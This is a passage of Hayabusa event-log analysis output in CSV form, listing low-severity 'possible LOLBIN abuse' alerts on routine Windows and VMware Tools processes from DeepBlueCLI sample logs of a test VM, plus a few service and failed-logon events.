C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xf34 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-21 01:03:07.801 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x250 | User: IE10WIN7$ | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-21 01:03:11.676 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x614 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-21 01:03:25.629 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc04 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-21 01:06:05.381 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x598 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-21 03:14:25.528 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x848 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-21 03:14:25.546 
+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xd30 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-21 03:14:25.561 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xfb8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-21 03:16:25.456 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x7b8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-21 04:31:04.654 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc18 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-21 05:05:57.675 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xdac | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-21 05:05:58.135 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb68 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-21 05:06:13.653 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf2c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-21 05:06:19.672 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdf0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-21 05:06:38.077 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xac0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-21 05:06:38.083 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x578 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:00:11.250 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd68 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:00:12.103 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:00:12.141 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x7b8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:00:33.844 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc58 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:03:11.036 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0x908 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:03:11.056 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xfe4 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:10:05.018 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc44 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:10:05.024 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x8ec | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:42:10.029 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xac0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:42:10.656 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x8e0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:42:10.669 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xf50 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:42:29.724 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x994 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:45:11.847 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0xbb0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:45:13.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-22 06:45:28.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-22 06:45:28.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-22 06:45:29.859 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6f0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:45:30.140 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1c0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:45:43.671 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x998 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:45:43.828 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:45:45.886 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xbe0 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:45:46.517 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xc00 | User: IEUser | LID: 0x4cfe1,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:45:47.330 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:58:44.730 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x238 | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 07:00:01.654 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf30 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 07:00:01.685 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf54 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 07:24:56.194 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x210 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 07:31:56.163 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0x6e8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 07:31:56.506 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\hqhlzlxj.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x710 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 07:31:56.600 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\ffyanabt.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xf70 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 07:31:56.756 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\b_6b5oib.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x6dc | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 07:31:56.834 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\kyk3rvnx.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x980 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 07:31:57.381 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" ""Local CMOS Clock"" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xe5c | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 07:31:57.397 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x7dc | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 07:37:26.756 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Path: C:\Windows\System32\rundll32.exe | PID: 0xdac | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-23 09:13:00.062 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x754 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-23 09:13:02.593 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x920 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-23 09:15:59.673 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xdfc | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-23 09:23:16.845 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\makecab.exe"" C:\Windows\Logs\CBS\CbsPersist_20160823002316.log C:\Windows\Logs\CBS\CbsPersist_20160823002316.cab | Path: C:\Windows\System32\makecab.exe | PID: 0xf7c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-23 09:28:51.548 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x3d0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-23 09:28:51.611 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xb50 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-23 09:28:51.626 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xad4 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-23 09:30:51.548 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xc44 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
